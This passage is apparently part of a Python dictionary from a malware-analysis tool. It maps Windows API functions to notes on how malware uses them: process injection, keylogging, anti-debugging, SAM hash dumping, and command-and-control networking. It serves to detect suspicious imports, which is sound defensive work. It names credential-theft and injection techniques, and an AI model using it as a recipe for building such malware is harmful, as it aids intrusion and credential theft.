"Returns a handle to the window currently in the foreground of the desktop. Keyloggers commonly use this function to determine in which window the user is entering his keystrokes.",
'gethostname':
"Retrieves the hostname of the computer. Backdoors sometimes use gethostname as part of a survey of the victim machine.",
'gethostbyname':
"Used to perform a DNS lookup on a particular hostname prior to making an IP connection to a remote host. Hostnames that serve as command- and-control servers often make good network-based signatures.",
'GetModuleFilename':
"Returns the filename of a module that is loaded in the current process. Malware can use this function to modify or copy files in the currently running process.",
'GetModuleHandle':
"Used to obtain a handle to an already loaded module. Malware may use GetModuleHandle to locate and modify code in a loaded module or to search for a good location to inject code.",
'GetProcAddress':
"Retrieves the address of a function in a DLL loaded into memory. Used to import functions from other DLLs in addition to the functions imported in the PE file header.",
'GetStartupInfo':
"Retrieves a structure containing details about how the current process was configured to run, such as where the standard handles are directed.",
'GetSystemDefaultLangId':
"Returns the default language settings for the system. This can be used to customize displays and filenames, as part of a survey of an infected victim, or by “patriotic” malware that affects only systems from certain regions.",
'GetTempPath':
"Returns the temporary file path. If you see malware call this function, check whether it reads or writes any files in the temporary file path.",
'GetThreadContext':
"Returns the context structure of a given thread. The context for a thread stores all the thread information, such as the register values and current state.",
'GetTickCount':
"Retrieves the number of milliseconds since bootup. This function is sometimes used to gather timing information as an anti-debugging technique. GetTickCount is often added by the compiler and is included in many executables, so simply seeing it as an imported function provides little information.",
'GetVersionEx':
"Returns information about which version of Windows is currently running. This can be used as part of a victim survey or to select between different offsets for undocumented structures that have changed between different versions of Windows.",
'GetWindowsDirectory':
"Returns the file path to the Windows directory (usually C:\Windows). Malware sometimes uses this call to determine into which directory to install additional malicious programs.",
'inet_addr':
"Converts an IP address string like 127.0.0.1 so that it can be used by func- tions such as connect . The string specified can sometimes be used as a network-based signature.",
'InternetOpenUrl':
"Opens a specific URL for a connection using FTP, HTTP, or HTTPS. URLs, if fixed, can often be good network-based signatures.",
'IsDebuggerPresent':
"Checks to see if the current process is being debugged, often as part oan anti-debugging technique. This function is often added by the compiler and is included in many executables, so simply seeing it as an imported function provides little information.",
'IsNTAdmin':
"Checks if the user has administrator privileges.",
'IsWoW64Process':
'Used by a 32-bit process to determine if it is running on a 64-bit operating system.',
'LdrLoadDll':
"Low-level function to load a DLL into a process, just like LoadLibrary . Normal programs use LoadLibrary , and the presence of this import may indicate a program that is attempting to be stealthy.",
'LoadLibrary':
"Loads a DLL into a process that may not have been loaded when the program started. Imported by nearly every Win32 program.",
'LoadResource':
"Loads a resource from a PE file into memory. Malware sometimes uses resources to store strings, configuration information, or other malicious files",
'LsaEnumerateLogonSessions':
"Enumerates through logon sessions on the current system, which can be used as part of a credential stealer.",
'MapViewOfFile':
"Maps a file into memory and makes the contents of the file accessible via memory addresses. Launchers, loaders, and injectors use this function to read and modify PE files. By using MapViewOfFile , the malware can avoid using WriteFile to modify the contents of a file.",
'MapVirtualKey':
"Translates a virtual-key code into a character value. It is often used by keylogging malware.",
'MmGetSystemRoutineAddress':
"Similar to GetProcAddress but used by kernel code. This function retrieves the address of a function from another module, but it can only get addresses from ntoskrnl.exe and hal.dll.",
'Module32First':
"Used to enumerate through modules loaded into a process. Injectors use this function to determine where to inject code.",
'Module32Next':
"Used to enumerate through modules loaded into a process. Injectors use this function to determine where to inject code.",
'NetScheduleJobAdd':
"Submits a request for a program to be run at a specified date and time. Malware can use NetScheduleJobAdd to run a different program. As a malware analyst, you’ll need to locate and analyze the program that will be run in the future.",
'NetShareEnum':
"Used to enumerate network shares.",
'NtQueryDirectoryFile':
"Returns information about files in a directory. Rootkits commonly hook this function in order to hide files.",
'NtQueryInformationProcess':
"Returns various information about a specified process. This function is sometimes used as an anti-debugging technique because it can return the same information as CheckRemoteDebuggerPresent .",
'NtSetInformationProcess':
"Can be used to change the privilege level of a program or to bypass Data Execution Prevention (DEP).",
'OleInitialize':
"Used to initialize the COM library. Programs that use COM objects must call OleInitialize prior to calling any other COM functions.",
'OpenMutex':
"Opens a handle to a mutual exclusion object that can be used by malware to ensure that only a single instance of malware is running on a system at any given time. Malware often uses fixed names for mutexes, which can be good host-based indicators.",
'OpenSCManager':
"Opens a handle to the service control manager. Any program that installs, modifies, or controls a service must call this function before any other service-manipulation function.",
'OutputDebugString':
"Outputs a string to a debugger if one is attached. This can be used as an anti-debugging technique.",
'PeekNamedPipe':
"Used to copy data from a named pipe without removing data from the pipe. This function is popular with reverse shells.",
'Process32First':
"Used to begin enumerating processes from a previous call to CreateToolhelp32Snapshot . Malware often enumerates through processes to find a process to inject into.",
'Process32Next':
"Used to begin enumerating processes from a previous call to CreateToolhelp32Snapshot . Malware often enumerates through processes to find a process to inject into.",
'QueryPerformanceCounter':
"Used to retrieve the value of the hardware-based performance counter. This function is sometimes using to gather timing information as part of an anti-debugging technique. It is often added by the compiler and is included in many executables, so simply seeing it as an imported function provides little information.",
'QueueUserAPC':
"Used to execute code for a different thread. Malware sometimes uses QueueUserAPC to inject code into another process.",
'recv':
"Receives data from a remote machine. Malware often uses this function to receive data from a remote command-and-control server.",
'RegisterHotKey':
"Used to register a handler to be notified anytime a user enters a particular key combination (like CTRL - ALT -J), regardless of which window is active when the user presses the key combination. This function is some- times used by spyware that remains hidden from the user until the key combination is pressed.",
'RegOpenKey':
"Opens a handle to a registry key for reading and editing. Registry keys are sometimes written as a way for software to achieve persistence on a host. The registry also contains a whole host of operating system and application setting information.",
'ResumeThread':
"Resumes a previously suspended thread. ResumeThread is used as part of several injection techniques.",
'RtlCreateRegistryKey':
"Used to create a registry from kernel-mode code.",
'RtlWriteRegistryValue':
"Used to write a value to the registry from kernel-mode code.",
'SamIConnect':
"Connects to the Security Account Manager (SAM) in order to make future calls that access credential information. Hash-dumping programs access the SAM database in order to retrieve the hash of users’ login passwords.",
'SamIGetPrivateData':
"Queries the private information about a specific user from the Security Account Manager (SAM) database. Hash-dumping programs access the SAM database in order to retrieve the hash of users’ login passwords.",
'SamQueryInformationUse':
"Queries information about a specific user in the Security Account Manager (SAM) database. Hash-dumping programs access the SAM database in order to retrieve the hash of users’ login passwords.",
'send':
"Sends data to a remote machine. Malware often uses this function to send data to a remote command-and-control server.",
'SetFileTime':
"Modifies the creation, access, or last modified time of a file. Malware often uses this function to conceal malicious activity.",
'SetThreadContext':
"Used to modify the context of a given thread. Some injection techniques use SetThreadContext.",
'StartServiceCtrlDispatcher':
"Used by a service to connect the main thread of the process to the service control manager. Any process that runs as a service must call this function within 30 seconds of startup. Locating this function in malware tells you that the function should be run as a service.",
'SuspendThread':
"Suspends a thread so that it stops running. Malware will sometimes suspend a thread in order to modify it by performing code injection.",
'system':
"Function to run another program provided by some C runtime libraries. On Windows, this function serves as a wrapper function to CreateProcess.",
'Thread32First':
"Used to iterate through the threads of a process. Injectors use these functions to find an appropriate thread to inject into.",
'Thread32Next':
"Used to iterate through the threads of a process. Injectors use these functions to find an appropriate thread to inject into.",
'Toolhelp32ReadProcessMemory':
"Used to read the memory of a remote process.",
'URLDownloadToFile':
"A high-level call to download a file from a web server and save it to disk. This function is popular with downloaders because it implements all the functionality of a downloader in one function call.",
'WideCharToMultiByte':
"Used to convert a Unicode string into an ASCII string.",
'Wow64DisableWow64FsRedirection':
"Disables file redirection that occurs in 32-bit files loaded on a 64-bit system. If a 32-bit application writes to C:\Windows\System32 after calling this function, then it will write to the real C:\Windows\System32 instead of being redirected to C:\Windows\SysWOW64.",
'WSAStartup':
"Used to initialize low-level network functionality. Finding calls to WSAStartup can often be an easy way to locate the start of network-related functionality."
}
